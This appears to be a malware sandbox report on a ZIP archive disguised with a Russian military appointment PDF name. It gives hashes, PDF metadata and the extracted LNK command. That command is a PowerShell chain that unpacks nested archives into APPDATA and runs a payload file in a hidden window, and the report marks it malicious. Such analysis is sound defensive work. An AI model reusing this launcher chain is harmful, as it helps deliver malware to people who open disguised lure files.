8716989448bc88ba125aead800021db0

ZIP Archive
|
MD5: 8716989448bc88ba125aead800021db0
|
Size: 7.92 MB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	8716989448bc88ba125aead800021db0
Sha1	e23b555e8c7264744970829cf98a2e702f3d762b
Sha256	e555083bdb62cf9df6aa7101908d9dbb89f55788ddab2e3288d57e48d43abd35
Sha384	f884277ad0c6010c5b943fea6cc0329a4a9b7d6a38c57a0489f162e1d2d0f6882988ebcadc671bf5e4436943a824c926
Sha512	fd19bea9b571cf5215f09778e9ca7c4cb99eb397ece22d1236c9e6128ab4088031b9739a2622930fcc25aac6419bbd81fd7e91c3f397dbb97b84b1ff0af6e34b
SSDeep	196608:ngDx8MLn/dAFIpjxWcnrxjReyMHVILBgsDm/eReTOh:nSx8MDlzT3beyM1igNkh
TLSH	CE86338061D0E5A367536CF0D72DF720719F9A1ADBA21900F4969A85B4278F807BB7CF

File Structure

Informations

Name0	Value
Исх №6626 Представление на назначение на воинскую должность.pdf	1.6
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901020936-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901021016-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901020936-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1
Исх №6626 Представление на назначение на воинскую должность.pdf	D:20250901021016-07'00'
Исх №6626 Представление на назначение на воинскую должность.pdf	Adobe Acrobat 22.1 Image Conversion Plug-in

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe $p=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip';Expand-Archive $p -DestinationPath $env:USERPROFILE\Downloads\incrementalStreamingMergingSocket; $p=$env:USERPROFILE+'\Downloads\incrementalStreamingMergingSocket\FOUND.000\processorContainerLogging.zip';Expand-Archive -Path $p -DestinationPath $env:APPDATA\reaper; $mergingAlgorithmEncrypting = gc $env:APPDATA\reaper\responsiveHashingSocketScalableDeterministic; Start-Process -WindowStyle Hidden powershell $mergingAlgorithmEncrypting
Deobfuscated PowerShell	$mergingAlgorithmEncrypting

Name0

Value

LNK: Command Execution

Deobfuscated PowerShell

8716989448bc88ba125aead800021db0 (7.92 MB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe $p=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip';Expand-Archive $p -DestinationPath $env:USERPROFILE\Downloads\incrementalStreamingMergingSocket; $p=$env:USERPROFILE+'\Downloads\incrementalStreamingMergingSocket\FOUND.000\processorContainerLogging.zip';Expand-Archive -Path $p -DestinationPath $env:APPDATA\reaper; $mergingAlgorithmEncrypting = gc $env:APPDATA\reaper\responsiveHashingSocketScalableDeterministic; Start-Process -WindowStyle Hidden powershell $mergingAlgorithmEncrypting Malicious	8716989448bc88ba125aead800021db0 > Исх №6626 Представление на назначение на воинскую должность.pdf.lnk
Deobfuscated PowerShell	$mergingAlgorithmEncrypting Malicious	8716989448bc88ba125aead800021db0 > Исх №6626 Представление на назначение на воинскую должность.pdf.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.